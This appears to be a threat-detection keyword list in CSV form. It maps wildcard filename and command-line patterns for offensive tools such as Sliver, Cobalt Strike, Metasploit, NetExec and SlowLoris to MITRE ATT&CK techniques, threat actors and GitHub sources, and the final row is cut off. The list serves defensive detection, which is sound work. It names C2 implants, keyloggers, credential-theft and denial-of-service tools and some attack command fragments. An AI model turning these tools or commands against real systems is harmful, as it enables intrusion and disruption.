+"*SLACKAES256Handler.*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*slackor.db*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*sleep_python_bridge.sleepy*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*sleep_python_bridge.striker*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*sleepmask.x64.o*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*sleepmask.x86.o*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*sleepmask_pivot.x64.o*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*sleepmask_pivot.x86.o*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*slemire/WSPCoerce*","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","203","29","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" +"*SlinkyCat.ps1*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","1","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*SlinkyCat-main*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","1","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*Sliver C2 Session*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*sliver.service*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*sliver.sh/install*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*sliver/.sliver*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*sliver:sliver*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*sliver_pcap_parser.py*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*sliver-client_linux*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*sliver-client_macos*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*sliver-client_windows.exe*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*sliver-dns*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*SliverKeylogger*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213","TA0006 - TA0009","N/A","N/A","Collection - Credential Access - Exfiltration","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","N/A","2","127","38","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" +"*sliverpb*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*sliver-server daemon*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*sliver-server.*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*SlowLoris*","offensive_tool_keyword","SlowLoris","Slowloris is basically an HTTP Denial of Service attack that affects threaded servers. It works like this","T1498 - T1496 - T1490","TA0002 - TA0004 - TA0007","N/A","N/A","DDOS","https://github.com/gkbrk/slowloris","1","1","N/A","N/A","10","2172","671","2023-05-05T19:21:29Z","2015-04-26T10:00:33Z" +"*slowloris.py*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*SluiEOP.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*smartbrute *kerberos*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*SmashedPotato.cs*","offensive_tool_keyword","SmashedPotato","A modification of @breenmachine original Hot Potato Priv Esc Exploit","T1059 - T1134 - T1201 - T1518","TA0002 - TA0004 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Cn33liz/SmashedPotato","1","1","N/A","N/A","1","81","35","2016-01-29T14:31:18Z","2016-01-20T20:49:08Z" +"*SmashedPotato.exe*","offensive_tool_keyword","SmashedPotato","A modification of @breenmachine original Hot Potato Priv Esc Exploit","T1059 - T1134 - T1201 - T1518","TA0002 - TA0004 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Cn33liz/SmashedPotato","1","1","N/A","N/A","1","81","35","2016-01-29T14:31:18Z","2016-01-20T20:49:08Z" +"*smb * -u * -p * * -M bh_owned*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*smb * -u * -p * -M ioxidresolver*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*smb.dcsync*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" +"*smb/impacket*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb/relay/ntlm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb_doublepulsar_rce.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb_doublepulsar_rce.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb_enumshares*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb_enumshares.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb_enumusers*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb_enumusers.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb_enumusers_domain.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb_eternalblue*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - 